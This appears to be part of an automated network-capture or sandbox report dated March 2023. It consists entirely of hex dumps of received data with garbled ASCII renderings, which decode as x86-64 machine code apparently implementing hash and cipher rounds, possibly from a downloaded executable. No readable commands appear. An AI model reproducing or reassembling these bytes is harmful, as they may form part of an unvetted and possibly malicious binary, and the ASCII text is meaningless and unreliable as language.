                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3841INData Raw: 02 41 01 eb 45 31 c6 41 89 c0 41 c1 c0 0a 45 31 f0 45 21 e5 44 8b 74 24 30 41 31 d5 45 01 e8 44 8b 6c 24 08 41 c1 c6 0f 41 01 e8 8b 6c 24 08 41 c1 cd 07 c1 c5 0e 44 31 ed 44 8b 6c 24 08 41 c1 ed 03 44 31 ed 44 8b 6c 24 30 03 6c 24 38 03 6c 24 1c 41 c1 c5 0d 45 31 f5 44 8b 74 24 30 41 c1 ee 0a 45 31 f5 46 8d 74 2d 00 41 89 f5 44 89 dd 41 31 fd 47 8d 94 32 47 91 a7 d5 c1 cd 06 44 89 74 24 38 45 21 dd 45 89 c6 41 31 f5 41 c1 ce 0d 45 01 d5 45 89 da 41 c1 ca 0b 41 31 ea 44 89 dd c1 c5 07 41 31 ea 45 01 d5 41 89 c2 42 8d 2c 29 44 89 c1 45 31 c2 c1 c9 02 41 31 ce 44 89 c1 c1 c1 0a 44 31 f1 45 21 d4 44 8b 74 24 34 41 31 c4 44 01 e1 44 8b 64 24 0c 41 c1 c6 0f 44 01 e9 44 8b 6c 24 0c 41 c1 c4 0e 41 c1 cd 07 45 31 ec 44 8b 6c 24 0c 41 c1 ed 03 45 31 ec 44 8b 6c 24
                                                                                                                                                                                                                    Data Ascii: AE1AAE1E!Dt$0A1EDl$AAl$AD1Dl$AD1Dl$0l$8l$AE1Dt$0AE1Ft-ADA1G2GDt$8E!EA1AEEAA1DA1EAB,)DE1A1DD1E!Dt$4A1DDd$ADDl$AAE1Dl$AE1Dl$
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3857INData Raw: 8b 47 28 48 8b 00 48 c1 e8 16 48 39 c8 0f 86 d0 fe ff ff 29 d0 48 8d ac 24 ac 00 00 00 89 84 24 ac 00 00 00 41 8b 47 68 85 c0 0f 84 74 02 00 00 49 8b 7f 70 31 db 4c 8d a4 24 90 00 00 00 eb 32 0f 1f 00 4c 89 e2 4c 89 ac 24 90 00 00 00 48 89 ac 24 98 00 00 00 e8 40 e6 ff ff 84 c0 75 43 41 8b 47 68 48 83 c3 01 89 c2 48 39 d3 0f 83 32 02 00 00 48 8b 0c df 83 39 02 75 c8 8b 94 24 ac 00 00 00 85 d2 74 dd 83 ea 01 48 8b 89 b8 00 00 00 89 94 24 ac 00 00 00 89 f2 e8 2d 0d fd ff 85 c0 74 bd b8 01 00 00 00 48 8b 7c 24 38 88 07 e9 30 fe ff ff 0f 1f 84 00 00 00 00 00 29 d0 48 8d ac 24 ac 00 00 00 89 84 24 ac 00 00 00 41 8b 46 68 85 c0 0f 84 83 00 00 00 49 8b 7e 70 31 db 4c 8d a4 24 90 00 00 00 eb 2e 0f 1f 00 4c 89 e2 4c 89 ac 24 90 00 00 00 48 89 ac 24 98 00 00 00 e8
                                                                                                                                                                                                                    Data Ascii: G(HHH9)H$$AGhtIp1L$2LL$H$@uCAGhHH92H9u$tH$-tH|$80)H$$AFhI~p1L$.LL$H$
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3873INData Raw: f4 00 00 00 41 c1 c4 10 41 31 f0 45 01 e6 41 c1 c8 0c 45 31 f2 44 01 c5 41 c1 ca 0c 31 e8 45 01 d5 c1 c8 08 45 31 ec 01 c6 41 c1 cc 08 41 31 f0 45 01 e6 45 31 fc 41 c1 c8 07 41 c1 c4 10 45 31 f2 44 01 e6 41 c1 ca 07 41 31 f1 41 c1 c9 0c 44 03 bc 24 ac 00 00 00 03 ac 24 08 01 00 00 45 01 cf 44 01 d5 45 31 fc 31 ea 41 c1 cc 08 c1 c2 10 44 01 e6 44 89 64 24 0c 41 31 f1 89 74 24 14 8b b4 24 00 01 00 00 41 c1 c9 07 01 fe 44 01 c6 31 f1 03 b4 24 04 01 00 00 c1 c1 10 41 01 ce 45 31 f0 41 c1 c8 0c 44 01 c6 31 f1 c1 c9 08 41 8d 3c 0e 44 8b b4 24 10 01 00 00 41 31 f8 89 7c 24 18 8d 3c 13 8b 9c 24 0c 01 00 00 41 31 fa 41 c1 c8 07 47 8d 24 2e 01 eb 41 c1 ca 0c 44 01 d3 31 da c1 ca 08 01 d7 41 31 fa 44 03 64 24 08 44 8b 74 24 10 44 31 e0 8b 6c 24 08 44 03 a4 24 14 01
                                                                                                                                                                                                                    Data Ascii: AA1EAE1DA1EE1AA1EE1AAE1DAA1AD$$EDE11ADDd$A1t$$AD1$AE1AD1A<D$A1|$<$A1AG$.AD1A1Dd$Dt$D1l$D$
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3889INData Raw: d1 e9 41 31 c8 89 f9 c1 c1 04 44 31 c1 41 89 f8 8b 7c 24 40 41 c1 c8 0d 44 31 c1 44 8d 04 3f 01 ca 8b 4c 24 40 c1 e9 02 41 31 c8 89 f9 c1 c1 0c 44 31 c1 41 89 f8 8b 7c 24 44 41 c1 c8 07 44 31 c1 44 8d 04 bd 00 00 00 00 01 ca 89 f9 41 31 f0 c1 c1 0f 44 31 c1 41 89 f8 8b 7c 24 34 41 c1 c8 03 44 31 c1 44 8d 04 bd 00 00 00 00 01 ca 89 f9 41 31 e8 c1 c1 08 44 31 c1 41 89 f8 8b 7c 24 24 41 c1 c8 09 44 31 c1 44 8d 04 bd 00 00 00 00 01 ca 89 f9 45 31 e0 c1 c1 0f 44 31 c1 41 89 f8 8b 7c 24 14 41 c1 c8 03 44 31 c1 44 8b 44 24 14 01 d1 8d 14 fd 00 00 00 00 41 d1 e8 44 31 c2 41 89 f8 8b 7c 24 18 41 c1 c0 04 44 31 c2 33 54 24 1c 44 8d 04 bd 00 00 00 00 44 33 44 24 10 01 ca 89 f9 c1 c1 08 44 31 c1 41 89 f8 8b 7c 24 04 41 c1 c8 09 44 31 c1 44 8d 04 3f 01 ca 8b 4c 24 04
                                                                                                                                                                                                                    Data Ascii: A1D1A|$@AD1D?L$@A1D1A|$DAD1DA1D1A|$4AD1DA1D1A|$$AD1DE1D1A|$AD1DD$AD1A|$AD13T$DD3D$D1A|$AD1D?L$
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3905INData Raw: 8b 44 24 10 44 01 e8 89 44 24 10 8b 44 24 14 44 01 e0 89 44 24 14 8b 44 24 08 01 f8 c1 c7 0b 89 44 24 08 8b 44 24 0c 01 f0 c1 c6 0b 89 44 24 0c 8b 44 24 20 01 d8 c1 c3 0b 89 44 24 20 8b 44 24 1c 03 44 24 4c 89 44 24 1c 8b 44 24 4c 44 33 7c 24 34 44 33 5c 24 3c 44 89 5c 24 48 44 8b 5c 24 50 c1 c0 0b 44 33 5c 24 40 44 8b 74 24 54 44 33 74 24 30 44 8b 6c 24 58 44 89 5c 24 4c 44 8b 5c 24 30 44 33 6c 24 38 44 8b 64 24 5c 44 33 64 24 2c 45 01 fb 33 7c 24 18 33 74 24 28 41 c1 c7 07 44 33 4c 24 24 33 5c 24 10 44 89 5c 24 30 44 8b 5c 24 34 33 44 24 14 44 33 44 24 08 33 4c 24 0c 45 01 f3 33 54 24 20 33 6c 24 1c 41 c1 c6 07 44 89 5c 24 34 44 8b 5c 24 2c 44 33 54 24 44 45 01 eb 41 c1 c5 07 44 89 5c 24 2c 44 8b 5c 24 38 45 01 e3 41 c1 c4 07 44 89 5c 24 38 44 8b 5c 24
                                                                                                                                                                                                                    Data Ascii: D$DD$D$DD$D$D$D$D$D$ D$ D$D$LD$D$LD3|$4D3\$<D\$HD\$PD3\$@Dt$TD3t$0Dl$XD\$LD\$0D3l$8Dd$\D3d$,E3|$3t$(AD3L$$3\$D\$0D\$43D$D3D$3L$E3T$ 3l$AD\$4D\$,D3T$DEAD\$,D\$8EAD\$8D\$
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3921INData Raw: 44 24 4c 8b 44 24 14 44 33 44 24 1c 44 8b 4c 24 58 44 33 4c 24 40 01 f8 c1 c7 0b 89 44 24 14 8b 44 24 10 01 f0 c1 c6 0b 89 74 24 54 89 44 24 10 8b 44 24 0c 01 d8 c1 c3 0b 89 44 24 0c 8b 44 24 08 89 de 03 44 24 48 89 44 24 08 8b 44 24 48 c1 c0 0b 89 c3 8b 44 24 24 44 01 c0 41 c1 c0 0b 89 44 24 24 8b 44 24 20 44 89 44 24 48 01 c8 c1 c1 0b 89 44 24 20 8b 44 24 1c 89 4c 24 58 44 89 f1 01 d0 c1 c2 0b 89 44 24 1c 8b 44 24 18 c1 c1 0b 89 54 24 5c 44 89 ea 01 e8 c1 c5 0b 89 44 24 18 8b 44 24 34 c1 c2 0b 89 6c 24 60 44 89 e5 44 01 f8 41 c1 c7 0b 89 44 24 34 8b 44 24 30 45 89 f8 c1 c5 0b 44 01 f0 89 44 24 30 8b 44 24 2c 44 01 e8 89 44 24 2c 8b 44 24 28 44 01 e0 89 44 24 28 8b 44 24 40 44 01 d8 41 c1 c3 0b 89 44 24 40 8b 44 24 44 44 01 d0 41 c1 c2 0b 89 44 24 44 8b
                                                                                                                                                                                                                    Data Ascii: D$LD$D3D$DL$XD3L$@D$D$t$TD$D$D$D$D$HD$D$HD$$DAD$$D$ DD$HD$ D$L$XDD$D$T$\DD$D$4l$`DDAD$4D$0EDD$0D$,DD$,D$(DD$(D$@DAD$@D$DDAD$D
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3937INData Raw: c1 ec 10 89 db 33 2c b9 45 0f b6 e4 41 33 2c 98 8b 9c 24 88 01 00 00 46 33 1c a0 33 2c b0 49 c1 e3 20 49 09 eb 4c 89 9c 24 48 01 00 00 ff c3 75 11 ff 04 24 75 0c 41 ff c1 41 83 f9 01 83 54 24 04 00 44 0f b6 5c 24 78 48 8b 74 24 78 4c 89 d5 48 8b 7c 24 78 48 c1 ed 20 42 33 1c 9a 45 89 d3 48 c1 ee 28 40 0f b6 ed 41 c1 eb 10 48 c1 ef 20 45 0f b6 db 49 89 fc 42 33 1c 98 4d 89 d3 49 c1 ec 18 49 c1 eb 38 42 33 1c 99 44 0f b6 de 40 0f b6 f7 c1 ef 10 43 33 1c 98 40 0f b6 ff 41 89 de 4c 89 d3 0f b6 df 45 8b 1c 98 44 33 1c b2 4c 89 d3 8b 74 24 78 48 c1 eb 30 c1 ee 18 44 33 1c b1 0f b6 f3 4c 89 d3 44 33 1c b0 8b 74 24 78 48 c1 eb 28 44 33 1c 24 c1 ee 10 40 0f b6 f6 8b 34 b0 42 33 34 a1 45 0f b6 e2 41 c1 ea 18 42 33 34 a2 44 0f b6 e3 48 8b 5c 24 78 43 33 34 a0 0f b6
                                                                                                                                                                                                                    Data Ascii: 3,EA3,$F33,I IL$Hu$uAAT$D\$xHt$xLH|$xH B3EH(@AH EIB3MII8B3D@C3@ALED3Lt$xH0D3LD3t$xH(D3$@4B34EAB34DH\$xC34
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3953INData Raw: 41 c1 e9 18 89 4c 24 0c 41 8b 3c b6 48 8d 35 98 c7 33 00 41 c1 e8 10 47 8b 14 94 42 8b 1c 8e 45 0f b6 c0 8b 88 80 00 00 00 47 8b 44 85 00 33 48 18 31 fb 31 50 2c 41 89 d9 44 89 db 0f b6 ef 45 31 c1 4c 89 e3 89 ed 45 31 d1 41 8b 2c ac 44 89 4c 24 08 45 89 d9 41 c1 e9 18 41 31 ea 46 8b 0c 8e 44 89 54 24 10 45 0f b6 d3 41 c1 eb 10 47 8b 14 96 45 0f b6 db 45 89 cc 45 31 d4 47 33 64 9d 00 41 89 cb 41 31 ec 89 cd 41 c1 eb 18 c1 ed 10 46 8b 1c 9e 40 0f b6 ed 45 8b 6c ad 00 0f b6 e9 0f b6 cd 45 31 d9 41 8b 2c ae 89 c9 45 31 e8 41 31 eb 45 31 eb 44 33 1c 8b 44 89 d1 41 89 d2 31 e9 41 c1 ea 18 0f b6 ee 4c 8d 2d dc c2 33 00 31 f9 42 8b 3c 96 41 89 d2 89 ed 41 c1 ea 10 0f b6 d2 45 0f b6 d2 41 31 f9 47 8b 54 95 00 44 8b 2c ab 8b 6c 24 10 45 31 d0 44 31 ed 41 33 3c 96
                                                                                                                                                                                                                    Data Ascii: AL$A<H53AGBEGD3H11P,ADE1LE1A,DL$EAA1FDT$EAGEEE1G3dAA1AF@ElE1A,E1A1E1D3DA1AL-31B<AAEA1GTD,l$E1D1A3<
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3969INData Raw: 08 41 81 e6 00 00 ff 00 45 31 c8 25 00 00 00 ff 44 31 e1 45 09 f5 41 89 d6 45 0f b6 c0 c1 ea 08 41 c1 ee 10 44 09 c0 81 e1 00 00 ff 00 44 31 da 45 31 e6 09 c1 81 e2 00 ff 00 00 41 81 e6 00 ff 00 00 09 ca 45 09 f5 44 89 ac 24 b8 00 00 00 89 94 24 bc 00 00 00 ff cd 0f 85 4a fd ff ff c7 44 24 6c 0d 00 00 00 48 8d 2d 3e 83 33 00 49 89 df 44 8b b4 24 b0 00 00 00 8b 84 24 c0 00 00 00 48 8d bc 24 8c 00 00 00 48 8d b4 24 1c 01 00 00 b9 09 00 00 00 41 b8 6c 00 00 00 48 8d 1d 0a 7f 33 00 44 31 f0 4c 8d 25 00 87 33 00 89 44 24 38 89 84 24 c0 00 00 00 8b 84 24 d4 00 00 00 44 31 f0 89 44 24 3c 89 84 24 d4 00 00 00 8b 84 24 f8 00 00 00 44 31 f0 44 33 b4 24 1c 01 00 00 44 89 b4 24 1c 01 00 00 f3 a5 89 44 24 40 48 8d b4 24 8c 00 00 00 89 84 24 f8 00 00 00 48 8d 84 24 b0
                                                                                                                                                                                                                    Data Ascii: AE1%D1EAEADD1E1AED$$JD$lH->3ID$$H$H$AlH3D1L%3D$8$$D1D$<$$D1D3$D$D$@H$$H$
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3985INData Raw: 48 33 34 fa 4c 89 ff 48 c1 ef 10 40 0f b6 ff 49 33 34 f8 48 89 ef 48 c1 ef 18 40 0f b6 ff 49 33 34 f9 4c 89 e7 48 c1 ef 20 40 0f b6 ff 49 33 34 fa 48 8b 7c 24 68 48 c1 ef 28 40 0f b6 ff 49 33 34 fb 48 89 b4 24 c0 00 00 00 48 8b 74 24 08 48 c1 ee 28 40 0f b6 f6 49 8b 3c f3 48 8d b1 b1 00 00 00 4b 33 3c ee 4c 89 f9 48 31 fe 48 8b 7c 24 38 45 0f b6 ef 48 c1 ef 38 48 33 34 f8 0f b6 fd 48 8b 0c 24 48 33 34 fa 48 89 ef 48 c1 ef 10 40 0f b6 ff 49 33 34 f8 4c 89 e7 48 c1 ef 18 40 0f b6 ff 49 33 34 f9 48 8b 7c 24 68 48 c1 ef 20 40 0f b6 ff 49 33 34 fa 48 8b 7c 24 10 48 c1 ef 30 40 0f b6 ff 48 33 34 fb 49 89 f4 48 8b 74 24 08 48 c1 ee 20 40 0f b6 f6 49 8b 3c f2 48 8d b1 c1 00 00 00 4b 33 3c ee 48 89 e9 48 31 fe 48 8b 7c 24 40 40 0f b6 ed 48 c1 ef 38 48 33 34 f8 0f
                                                                                                                                                                                                                    Data Ascii: H34LH@I34HH@I34LH @I34H|$hH(@I34H$Ht$H(@I<HK3<LH1H|$8EH8H34H$H34HH@I34LH@I34H|$hH @I34H|$H0@H34IHt$H @I<HK3<HH1H|$@@H8H34
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC4001INData Raw: 30 48 89 ac 24 d8 01 00 00 48 89 84 24 78 01 00 00 48 8b 44 24 38 48 89 bc 24 e0 01 00 00 48 89 84 24 80 01 00 00 48 8b 44 24 40 48 89 84 24 88 01 00 00 48 8b 44 24 48 48 89 84 24 90 01 00 00 48 8b 44 24 60 48 89 84 24 98 01 00 00 48 8b 44 24 68 48 89 84 24 a0 01 00 00 48 8b 44 24 70 48 89 84 24 a8 01 00 00 48 8b 44 24 78 48 89 84 24 b0 01 00 00 48 8b 84 24 80 00 00 00 48 89 84 24 b8 01 00 00 48 8d 94 24 e8 00 00 00 48 8b 04 ca 49 33 04 c8 48 89 04 ca 48 ff c1 48 83 f9 10 75 e3 48 8d 84 24 e8 01 00 00 48 8d b4 24 28 01 00 00 48 8b 9c 24 c0 02 00 00 48 89 c7 48 2b 84 24 e0 02 00 00 f3 a5 48 8d 70 40 48 8b 84 24 c0 02 00 00 8b 8c 24 e0 02 00 00 48 8b bc 24 d8 02 00 00 f3 a4 48 8d 90 88 00 00 00 b9 1e 00 00 00 48 c7 80 80 00 00 00 00 00 00 00 48 89 d7 31 c0
                                                                                                                                                                                                                    Data Ascii: 0H$H$xHD$8H$H$HD$@H$HD$HH$HD$`H$HD$hH$HD$pH$HD$xH$H$H$H$HI3HHHuH$H$(H$HH+$Hp@H$$H$HHH1
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC4017INData Raw: 89 f7 8b 73 08 41 33 73 08 41 33 72 08 41 33 71 08 41 33 70 08 33 71 08 33 72 08 33 70 08 89 74 24 38 8b 73 0c 41 33 73 0c 41 33 72 0c 41 33 71 0c 41 33 70 0c 33 71 0c 33 72 0c 33 70 0c 41 89 f6 8b 73 10 41 33 73 10 41 33 72 10 41 33 71 10 41 33 70 10 33 71 10 33 72 10 33 70 10 89 74 24 48 8b 73 14 41 33 73 14 41 33 72 14 41 33 71 14 41 33 70 14 33 71 14 33 72 14 33 70 14 89 74 24 50 8b 73 18 41 33 73 18 41 33 72 18 41 33 71 18 41 33 70 18 33 71 18 33 72 18 33 70 18 89 74 24 64 8b 73 1c 41 33 73 1c 41 33 72 1c 41 33 71 1c 41 33 70 1c 33 71 1c 33 72 1c 33 70 1c 8b 7b 24 89 74 24 68 8b 73 20 41 33 73 20 41 33 72 20 41 33 71 20 41 33 70 20 33 71 20 33 72 20 33 70 20 41 33 7b 24 41 33 7a 24 41 33 79 24 41 33 78 24 33 79 24 33 7a 24 33 78 24 89 fd 8b 7b 28 41
                                                                                                                                                                                                                    Data Ascii: sA3sA3rA3qA3p3q3r3pt$8sA3sA3rA3qA3p3q3r3pAsA3sA3rA3qA3p3q3r3pt$HsA3sA3rA3qA3p3q3r3pt$PsA3sA3rA3qA3p3q3r3pt$dsA3sA3rA3qA3p3q3r3p{$t$hs A3s A3r A3q A3p 3q 3r 3p A3{$A3z$A3y$A3x$3y$3z$3x${(A
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC4033INData Raw: 45 31 e7 41 21 ec 45 31 f4 46 8d 34 ed 00 00 00 00 44 89 a4 24 bc 00 00 00 44 8b a4 24 e4 00 00 00 41 31 c4 45 31 ec 44 89 a4 24 c4 00 00 00 41 89 dc 41 31 c4 45 31 e6 44 8b a4 24 c4 00 00 00 41 f7 d6 41 d1 c4 41 c1 c6 07 45 31 e5 41 c1 e4 07 44 89 74 24 38 41 31 c4 8b 84 24 e0 00 00 00 45 31 f5 45 31 f4 44 89 ac 24 cc 00 00 00 41 c1 cc 0a c1 c0 0d 41 31 da 41 31 d1 44 33 94 24 b0 00 00 00 8d 1c c5 00 00 00 00 41 31 c3 44 89 a4 24 d0 00 00 00 41 c1 c2 03 31 d3 45 31 d3 44 31 d3 f7 d3 41 d1 c3 44 89 5c 24 40 41 89 db 41 c1 c3 07 89 9c 24 c8 00 00 00 33 44 24 40 44 31 d8 8b 5c 24 40 44 33 4c 24 64 c1 c0 05 41 c1 c1 03 89 84 24 e0 00 00 00 c1 e3 07 8b 84 24 ec 00 00 00 44 31 db 44 31 d3 c1 c0 0d 44 8b 94 24 b0 00 00 00 8d 14 c5 00 00 00 00 89 9c 24 d4 00 00
                                                                                                                                                                                                                    Data Ascii: E1A!E1F4D$D$A1E1D$AA1E1D$AAAE1ADt$8A1$E1E1D$AA1A1D3$A1D$A1E1D1AD\$@AA$3D$@D1\$@D3L$dA$$D1D1D$$
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC4049INData Raw: 21 ca 48 31 c2 4c 89 e0 4c 21 e8 49 31 dd 4c 31 cb 48 31 c8 4d 89 ea 48 89 f1 49 21 c0 48 21 c3 48 f7 d1 4d 31 f8 4c 31 e3 4c 21 d9 48 33 8c 24 88 00 00 00 4d 09 c2 49 31 c2 48 8b 44 24 28 4c 31 c0 49 21 d8 49 89 c7 48 8b 44 24 18 49 31 e8 4d 31 e8 4c 8b 6c 24 70 48 f7 d0 49 89 c4 48 8b 04 24 48 21 c8 4c 31 d8 49 89 f3 4d 21 e3 4d 89 de 4c 8b 1c 24 49 31 ce 48 89 f1 49 f7 d3 4c 21 f1 48 33 0c 24 49 21 f3 4d 31 dc 4c 33 5c 24 18 4d 21 f3 4d 89 e1 49 31 f3 48 8b 74 24 78 49 09 c9 4d 31 f1 48 31 ce 49 89 f6 48 8b 74 24 20 4c 31 d6 49 21 d2 48 31 da 48 8b 5c 24 28 4d 31 fa 48 31 ea 48 33 54 24 10 4c 8b 7c 24 10 4c 31 d5 4c 31 c3 48 89 6c 24 18 48 8b 6c 24 20 48 31 d5 48 31 f3 4d 31 cd 49 21 c1 4c 31 d8 4d 31 f1 4c 21 d9 49 31 f7 49 be cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                    Data Ascii: !H1LL!I1L1H1MHI!H!HM1L1L!H3$MI1HD$(L1I!IHD$I1M1Ll$pHIH$H!L1IM!ML$I1HIL!H3$I!M1L3\$M!MI1Ht$xIM1H1IHt$ L1I!H1H\$(M1H1H3T$L|$L1L1Hl$Hl$ H1H1M1I!L1M1L!I1I
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC4065INData Raw: 7c 24 08 49 bf 55 55 55 55 55 55 55 55 49 31 d3 4c 21 e6 49 d1 ee 4d 21 fe 4d 89 f7 4d 89 e6 49 09 f7 48 8d 74 2d 00 48 d1 ed 4c 21 e6 4c 89 7c 24 70 49 bc 55 55 55 55 55 55 55 55 4c 21 e5 48 09 f5 4b 8d 34 00 49 d1 e8 4d 21 e0 4c 21 f6 48 89 6c 24 78 4c 89 f5 4c 09 c6 4c 8d 04 00 48 d1 e8 4c 21 e0 4d 21 f0 49 89 c7 48 8d 04 09 48 d1 e9 4d 09 c7 48 21 e8 49 b8 55 55 55 55 55 55 55 55 4c 21 c1 4d 89 fe 48 09 c1 48 8d 04 12 48 d1 ea 48 21 e8 4c 21 c2 48 09 c2 48 8d 04 1b 48 d1 eb 48 21 e8 4c 21 c3 48 09 c3 4b 8d 44 2d 00 49 d1 ed 4d 21 c5 48 21 e8 4d 89 d0 4c 89 ed 48 09 c5 48 89 6c 24 10 48 89 fd 4c 8b 3c 24 48 f7 d5 48 89 e8 49 f7 d7 48 bd 1f b1 79 ea a9 28 21 74 48 21 e8 48 33 84 24 80 00 00 00 4d 89 fc 49 21 c0 49 31 e8 48 89 fd 4c 21 fd 49 89 ed 4c 89
                                                                                                                                                                                                                    Data Ascii: |$IUUUUUUUUI1L!IM!MMIHt-HL!L|$pIUUUUUUUUL!HK4IM!L!Hl$xLLLHL!M!IHHMH!IUUUUUUUUL!MHHHH!L!HHHH!L!HKD-IM!H!MLHHl$HL<$HHIHy(!tH!H3$MI!I1HL!IL
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC4081INData Raw: 75 0a ba 2f 00 00 00 4d 85 c0 74 08 ba 6f 00 00 00 4c 29 c2 4c 8d 4c 24 21 31 c0 4c 8d 64 24 20 48 89 d1 4c 89 cf f3 aa 48 8b 8e c8 00 00 00 48 89 c8 48 c1 e8 37 48 0f c8 48 c1 e1 09 48 89 44 14 21 4e 8d 04 c1 4d 01 d0 49 0f c8 4c 89 44 14 29 48 89 f1 4c 8d 42 11 4c 89 e2 e8 3b 79 ff ff 48 81 c6 88 00 00 00 4c 89 e7 b9 10 00 00 00 f3 a5 b8 10 00 00 00 48 8d 0c ad 00 00 00 00 48 89 df 48 29 e8 89 c9 49 8d 34 84 f3 a4 48 81 c4 a0 00 00 00 5b 5e 5f 5d 41 5c c3 57 56 48 8d 35 c8 8d 34 00 48 8d 51 48 48 c7 41 40 00 00 00 00 48 89 c8 b9 20 00 00 00 48 89 d7 f3 a5 48 c7 80 c8 00 00 00 00 00 00 00 5e 5f c3 e9 cc 78 ff ff 48 83 ec 38 45 31 c0 48 c7 44 24 20 07 00 00 00 49 89 d1 31 d2 e8 d8 fe ff ff 90 48 83 c4 38 c3 48 83 ec 38 48 c7 44 24 20 07 00 00 00 e8 c0 fe
                                                                                                                                                                                                                    Data Ascii: u/MtoL)LL$!1Ld$ HLHHH7HHHD!NMILD)HLBL;yHLHHH)I4H[^_]A\WVH54HQHHA@H HH^_xH8E1HD$ I1H8H8HD$
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC4097INData Raw: 33 4c 24 3c 44 33 54 24 24 89 9c 24 f8 00 00 00 8b 4c 24 48 33 4c 24 78 44 89 bc 24 f4 00 00 00 8b 9c 24 98 00 00 00 44 8b 7c 24 40 44 31 e9 33 6c 24 60 44 8b 44 24 58 44 31 e3 44 33 84 24 b0 00 00 00 44 8b 6c 24 58 45 31 f7 89 9c 24 98 00 00 00 8b 9c 24 dc 00 00 00 44 33 6c 24 68 44 89 94 24 dc 00 00 00 44 31 e3 41 31 fd 89 5c 24 30 8b 5c 24 38 44 89 4c 24 38 33 5c 24 28 44 8b 4c 24 40 44 33 4c 24 50 89 5c 24 28 45 31 e1 44 8b 64 24 48 44 33 64 24 54 44 8b 54 24 60 8b 9c 24 d4 00 00 00 33 5c 24 0c 44 8b b4 24 d8 00 00 00 44 33 74 24 0c 89 5c 24 18 8b 5c 24 10 44 33 54 24 14 45 31 f1 44 33 54 24 08 44 89 4c 24 40 44 31 e3 44 89 54 24 48 44 8b 4c 24 08 44 8b 9c 24 d0 00 00 00 44 33 4c 24 18 44 33 5c 24 0c 44 8b 54 24 20 44 33 54 24 08 33 54 24 08 44 31 c9
                                                                                                                                                                                                                    Data Ascii: 3L$<D3T$$$L$H3L$xD$$D|$@D13l$`DD$XD1D3$Dl$XE1$$D3l$hD$D1A1\$0\$8DL$83\$(DL$@D3L$P\$(E1Dd$HD3d$TDT$`$3\$D$D3t$\$\$D3T$E1D3T$DL$@D1DT$HDL$D$D3L$D3\$DT$ D3T$3T$D1
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC4113INData Raw: 28 44 8b 44 24 38 44 33 5c 24 14 44 33 44 24 14 f7 d2 44 31 c3 8b 74 24 18 45 21 d8 8b 4c 24 3c 41 31 d0 44 8b 64 24 2c 09 da 33 4c 24 1c 31 d6 44 31 c3 41 31 d3 41 21 d0 8b 54 24 1c 23 54 24 10 41 f7 d3 41 31 d4 44 8b 4c 24 10 44 0b 4c 24 2c 31 ca 44 33 4c 24 1c 41 f7 d4 8b 7c 24 10 44 21 c9 44 31 e1 41 09 d4 31 ca 44 31 e7 44 21 e1 31 f2 c1 c6 02 31 d6 c1 c2 0e 31 f2 c1 c6 0a 31 d6 d1 c2 45 31 e1 31 d9 45 31 c1 c1 c3 02 44 31 df 33 30 31 cb 41 f7 d1 41 c1 c3 02 89 74 24 18 41 c1 c0 02 c1 c1 0e 41 31 fb 48 83 c0 04 45 31 c8 31 d9 48 8b b4 24 20 01 00 00 c1 c7 0e 41 c1 c1 0e c1 c3 0a 44 31 df 48 83 84 24 20 01 00 00 04 45 31 c1 31 cb 41 c1 c3 0a 33 16 41 c1 c0 0a 41 31 fb 89 5c 24 14 d1 c7 45 31 c8 d1 c1 48 8d 1d f6 0e 34 00 89 7c 24 10 41 d1 c1 44 89 5c
                                                                                                                                                                                                                    Data Ascii: (DD$8D3\$D3D$D1t$E!L$<A1Dd$,3L$1D1A1A!T$#T$AA1DL$DL$,1D3L$A|$D!D1A1D1D!1111E11E1D1301AAt$AA1HE11H$ AD1H$ E11A3AA1\$E1H4|$AD\
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC4129INData Raw: 41 89 cc 43 33 34 b0 47 33 1c a7 45 33 1c a8 45 0f b6 e2 89 f1 44 89 dd 46 8b 34 a2 44 0f b6 e3 c1 ed 18 46 8b 2c a2 44 0f b6 e6 44 33 34 a8 0f b6 ef 44 33 74 24 6c 89 ed 46 8b 24 a2 45 33 34 af 44 89 d5 c1 ed 18 44 33 2c a8 0f b6 ed 44 33 6c 24 70 44 89 d9 89 ed 45 33 2c af 89 dd c1 ed 18 44 33 24 a8 0f b6 ed 44 33 64 24 74 44 89 d1 89 ed 0f b6 cd 45 33 24 af 41 89 f7 41 0f b6 eb 41 c1 ef 18 c1 ee 10 8b 2c aa 41 c1 eb 10 40 0f b6 f6 42 33 2c b8 41 89 cf 45 0f b6 db 45 33 34 b0 33 6c 24 78 c1 eb 10 47 33 2c 98 44 89 74 24 7c 44 89 f6 0f b6 db 48 8d 0d 4d db 33 00 41 c1 ea 10 42 33 2c b9 44 89 ac 24 80 00 00 00 45 0f b6 d2 41 8b 49 30 41 33 2c 98 44 89 eb 4c 8d 2d 27 db 33 00 45 8b 79 38 45 8b 71 3c 89 ac 24 88 00 00 00 31 ce 47 33 24 90 44 0f b6 54 24 0c
                                                                                                                                                                                                                    Data Ascii: AC34G3E3EDF4DF,DD34D3t$lF$E34DD3,D3l$pDE3,D3$D3d$tDE3$AAA,A@B3,AEE343l$xG3,Dt$|DHM3AB3,D$EAI0A3,DL-'3Ey8Eq<$1G3$DT$
